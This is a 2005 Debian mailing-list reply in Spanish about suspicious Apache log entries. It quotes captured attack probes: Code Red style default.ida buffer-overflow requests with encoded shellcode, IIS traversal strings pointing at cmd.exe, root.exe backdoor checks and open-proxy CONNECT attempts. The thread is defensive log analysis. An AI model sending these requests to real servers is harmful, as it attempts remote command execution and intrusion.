Re: Peticiones "extrañas", Apache2
Hola eso es muy común y pasa a diario son pruebas de ataque a servidores
no Apache.
Mira mis logs de ayer:
!!!! 18 possible successful probes
/d/winnt/system32/cmd.exe?/c+dir HTTP Response 302
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP Response 302
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
HTTP Response 302
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%
1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP
Response 302
/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/root.exe?/c+dir HTTP Response 302
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP Response 302
/_vti_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/c/winnt/system32/cmd.exe?/c+dir HTTP Response 302
/MSADC/root.exe?/c+dir HTTP Response 302
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response
302
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
HTTP Response 302
A total of 8 unidentified 'other' records logged
GET /////. HTTP/1.1 with response code(s) 1 200 responses
A%\xd0\xe0 with response code(s) 1 200 responses
- with response code(s) 1 408 responses
GET //. HTTP/1.1 with response code(s) 1 200 responses
GET ////. HTTP/1.1 with response code(s) 1 200 responses
GET /. HTTP/1.1 with response code(s) 1 200 responses
GET //////. HTTP/1.1 with response code(s) 1 200 responses
GET ///. HTTP/1.1 with response code(s) 1 200 responses
El vie, 13-05-2005 a las 09:31 +0200, gesala gesala escribió:
> Hola a todos:
> Hoy por la mañana viendo los logs de apache me he encontrado las
> siguientes lineas:
>
>
> 81.192.173.101 - - [13/May/2005:03:31:50 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 317 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:25 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:26 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 61.74.254.142 - - [13/May/2005:03:35:28 +0200] "CONNECT
> maila.microsoft.com:25 HTTP/1.0" 405 340 "-" "-"
> 81.22.194.62 - - [13/May/2005:04:29:00 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 317 "-" "-"
>
> Tengo un mosqueo de la leche .
> Parece en la 1º y ultima peticion el servidor apache les da un error
> 404. Me equivoco? y las lineas del medio no las logro entender.
>
> Me han hackeado? He mirado los logs de mi maquina pero no parece que
> han hecho nada mas.
>
> Por otra parte, tengo un servidor ssh y de vez en cuando veo intentos
> de login desde una ip "extraña", la cual intenta logearse
> repetidamente con nombres ingleses, por supuesto no logra entrar ya
> que mi maquina no tiene esos nombres. Hay alguna forma de bloquear
> durante un tiempo una ip que intenta logearse y falla por ejemplo 3
> veces?
> O alguna otra idea?
.''`. Luis Pérez Meliá
: :' :
`. `'`
`- Debian GNU/Linux
Reply to: